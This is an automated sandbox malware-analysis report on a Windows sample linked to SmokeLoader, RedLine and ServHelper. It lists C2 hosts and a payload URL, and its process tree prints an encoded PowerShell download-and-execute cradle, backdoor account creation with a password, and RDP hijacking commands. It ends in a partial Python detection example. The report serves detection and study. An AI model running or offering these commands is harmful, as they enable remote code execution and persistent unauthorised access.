Analysis
max time kernel: 151s
max time network: 155s
platform: windows10_x64
resource: win10-en-20211208
submitted: 09-12-2021 11:59
Static task: static1
Behavioral task: behavioral1
Sample: 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Resource: win10-en-20211208
General
Target: 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Size: 299KB
MD5: a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
SHA1: e5d892d8c416d2768f12e7f45c8588a0c98f5987
SHA256: 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
SHA512: 041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
Malware Config
Extracted
URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
Family: smokeloader
Version: 2020
C2:
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
Family: redline
C2: 195.133.47.114:38627
Extracted
Family: systembc
C2: 185.209.30.180:4001
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 4 IoCs
Processes:
resource | yara_rule
behavioral1/memory/808-122-0x0000000000C60000-0x0000000000CC8000-memory.dmp | family_redline
C:\Users\Admin\AppData\Local\Temp\2B53.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\2B53.exe | family_redline
behavioral1/memory/1724-153-0x0000000000AC0000-0x0000000000B2C000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
Blocklisted process makes network request 9 IoCs
Processes:
flow | pid | process
93 | 1752 | powershell.exe
95 | 1752 | powershell.exe
96 | 1752 | powershell.exe
97 | 1752 | powershell.exe
99 | 1752 | powershell.exe
101 | 1752 | powershell.exe
103 | 1752 | powershell.exe
105 | 1752 | powershell.exe
107 | 1752 | powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs
Processes:
pid | process
808 | 2556.exe
3976 | 2B53.exe
1724 | 3372.exe
1308 | 40F0.exe
2368 | auuewje
3960 | 40F0.exe
2980 | 5BCC.exe
Modifies RDP port number used by Windows 1 TTPs
Sets DLL path for service in the registry 2 TTPs
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
Deletes itself 1 IoCs
Processes:
pid | process
3040 | (name not recorded)
Loads dropped DLL 2 IoCs
Processes:
pid | process
3136 | (name not recorded)
3136 | (name not recorded)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid | process
808 | 2556.exe
1724 | 3372.exe
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
Drops file in Windows directory 21 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\wow64.job | 40F0.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_t03iaan0.hjn.ps1 | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_t4ztxclk.fgt.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF44.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF55.tmp | powershell.exe
File opened for modification | C:\Windows\Tasks\wow64.job | 40F0.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF04.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF34.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF66.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | auuewje
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | auuewje
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | auuewje
Modifies data under HKEY_USERS 64 IoCs
Processes:
All 64 entries are by powershell.exe and sit under \REGISTRY\USER\S-1-5-20\Software\ (S-1-5-20 is NT AUTHORITY\NETWORK SERVICE, the account the script elevates below); ioc paths are given relative to that prefix.
description | ioc
Key created | Microsoft\SystemCertificates\Root\CRLs
Key created | Policies\Microsoft\SystemCertificates\trust\Certificates
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"
Set value (str) | Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"
Key created | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
Key created | Microsoft\SystemCertificates\CA\CTLs
Key created | Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
Set value (data) | Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
Key created | Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"
Key created | Policies\Microsoft\SystemCertificates\trust
Key created | Microsoft
Key created | Microsoft\SystemCertificates\Disallowed\Certificates
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
Key created | Microsoft\SystemCertificates\CA
Key created | Policies\Microsoft\SystemCertificates\CA\Certificates
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"
Key created | Microsoft\SystemCertificates\SmartCardRoot\CRLs
Key created | Microsoft\SystemCertificates\TrustedPeople\CRLs
Key created | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Set value (data) | Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"
Key created | Microsoft\SystemCertificates\Disallowed
Key created | Microsoft\SystemCertificates\Disallowed\CRLs
Key created | Microsoft\SystemCertificates\trust\CTLs
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
Key created | Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
Key created | Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
Key created | Microsoft\SystemCertificates\CA\Certificates
Key created | Policies\Microsoft\SystemCertificates\Disallowed\CTLs
Key created | Microsoft\Advanced INF Setup
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"
Set value (str) | Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"
Key created | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
Key created | Microsoft\SystemCertificates\Root\CTLs
Set value (str) | Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"
Modifies registry key 1 TTPs 1 IoCs
Runs net.exe
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 95 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 96 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 97 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 99 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process | entries
3504 | 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe | 2
3040 | (name not recorded) | 62
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3040 | (name not recorded)
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
620 | (name not recorded)
620 | (name not recorded)
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
3504 | 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
2368 | auuewje
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege and Token: SeCreatePagefilePrivilege, alternating (30 entries in total, interleaved between the SeDebugPrivilege entries below) | 3040 | (name not recorded)
Token: SeDebugPrivilege | 808 | 2556.exe
Token: SeDebugPrivilege | 1724 | 3372.exe
Token: SeDebugPrivilege | 3976 | 2B53.exe
Token: SeDebugPrivilege | 2108 | powershell.exe
Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 entries; the last four are privilege LUIDs the sandbox did not resolve to names) | 1064 | powershell.exe
Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege (8 entries) | 2996 | powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process
3040 | (name not recorded)
3040 | (name not recorded)
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid | process
3040 | (name not recorded)
3040 | (name not recorded)
3040 | (name not recorded)
3040 | (name not recorded)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid (process) -> target pid (process) | entries
3040 (name not recorded) -> 808 (2556.exe) | 3
3040 (name not recorded) -> 3976 (2B53.exe) | 3
3040 (name not recorded) -> 1724 (3372.exe) | 3
3040 (name not recorded) -> 1308 (40F0.exe) | 3
3040 (name not recorded) -> 2980 (5BCC.exe) | 2
2980 (5BCC.exe) -> 2108 (powershell.exe) | 2
2108 (powershell.exe) -> 3848 (csc.exe) | 2
3848 (csc.exe) -> 3704 (cvtres.exe) | 2
2108 (powershell.exe) -> 2820 (csc.exe) | 2
2820 (csc.exe) -> 1736 (cvtres.exe) | 2
2108 (powershell.exe) -> 1064 (powershell.exe) | 2
2108 (powershell.exe) -> 2996 (powershell.exe) | 2
2108 (powershell.exe) -> 1300 (powershell.exe) | 2
2108 (powershell.exe) -> 3160 (reg.exe) | 2
2108 (powershell.exe) -> 356 (reg.exe) | 2
2108 (powershell.exe) -> 1352 (reg.exe) | 2
2108 (powershell.exe) -> 3844 (net.exe) | 2
3844 (net.exe) -> 2708 (net1.exe) | 2
2108 (powershell.exe) -> 3704 (cmd.exe) | 2
3704 (cmd.exe) -> 3232 (cmd.exe) | 2
3232 (cmd.exe) -> 2472 (net.exe) | 2
2472 (net.exe) -> 3612 (net1.exe) | 2
2108 (powershell.exe) -> 3608 (cmd.exe) | 2
3608 (cmd.exe) -> 3848 (cmd.exe) | 2
3848 (cmd.exe) -> 1684 (net.exe) | 2
1684 (net.exe) -> 3972 (net1.exe) | 2
2880 (cmd.exe) -> 392 (net.exe) | 2
392 (net.exe) -> 1156 (net1.exe) | 2
1296 (cmd.exe) -> 1320 (net.exe) | 2
1320 (net.exe) -> 3852 (net1.exe) | 2
Note that PIDs 3704 and 3848 are reused within the run (cvtres.exe and csc.exe first, cmd.exe later), so a pid alone does not identify a process in this report; match on pid plus image name and parent.
Processes
-
C:\Users\Admin\AppData\Local\Temp\74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe"C:\Users\Admin\AppData\Local\Temp\74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2556.exeC:\Users\Admin\AppData\Local\Temp\2556.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2B53.exeC:\Users\Admin\AppData\Local\Temp\2B53.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3372.exeC:\Users\Admin\AppData\Local\Temp\3372.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeC:\Users\Admin\AppData\Local\Temp\40F0.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\auuewjeC:\Users\Admin\AppData\Roaming\auuewje1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeC:\Users\Admin\AppData\Local\Temp\40F0.exe start1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5BCC.exeC:\Users\Admin\AppData\Local\Temp\5BCC.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8818.tmp" "c:\Users\Admin\AppData\Local\Temp\hlytvvhu\CSCD325231E0BC419885828D16AAB4B2A2.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9084.tmp" "c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\CSC274793B17BA34147AA1A9E992D21413.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc qOgyLOeJ /add1⤵
- Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  net.exe user WgaUtilAcc qOgyLOeJ /add
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  C:\Windows\system32\net1 user WgaUtilAcc qOgyLOeJ /add
C:\Windows\System32\cmd.exe  cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  C:\Windows\system32\net.exe  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    C:\Windows\system32\net1.exe  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe  cmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
  C:\Windows\system32\net.exe  net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
    C:\Windows\system32\net1.exe  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
C:\Windows\System32\cmd.exe  cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  C:\Windows\system32\net.exe  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    C:\Windows\system32\net1.exe  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe  cmd /C net.exe user WgaUtilAcc qOgyLOeJ
  C:\Windows\system32\net.exe  net.exe user WgaUtilAcc qOgyLOeJ
    C:\Windows\system32\net1.exe  C:\Windows\system32\net1 user WgaUtilAcc qOgyLOeJ
C:\Windows\System32\cmd.exe  cmd.exe /C wmic path win32_VideoController get name
  C:\Windows\System32\Wbem\WMIC.exe  wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe  cmd.exe /C wmic CPU get NAME
  C:\Windows\System32\Wbem\WMIC.exe  wmic CPU get NAME
C:\Windows\System32\cmd.exe  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  C:\Windows\system32\cmd.exe  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
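The process tree above is the whole ServHelper RDP-backdoor routine in one screen: a local account is created, added to "Remote Desktop Users" and "Administrators", its password is set again, the GPU and CPU are fingerprinted through wmic, and a PowerShell download cradle is launched with its script hidden behind -enc. The following added example (it is not code from the sandbox or from the malware) shows how to decode such an -enc argument and how to score this chain as a whole rather than as eight unrelated command lines. The rule names, the tokenizer and the ordering logic are this example's own; the command lines fed to it are copied from the tree above and the base64 blob is the one on the powershell.exe line.

```python
import base64
import re

# Constructed sample input, copied from the process tree above: one command line
# per process, in launch order. ENC_BLOB is the -enc argument exactly as the report
# shows it on the powershell.exe line.
ENC_BLOB = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
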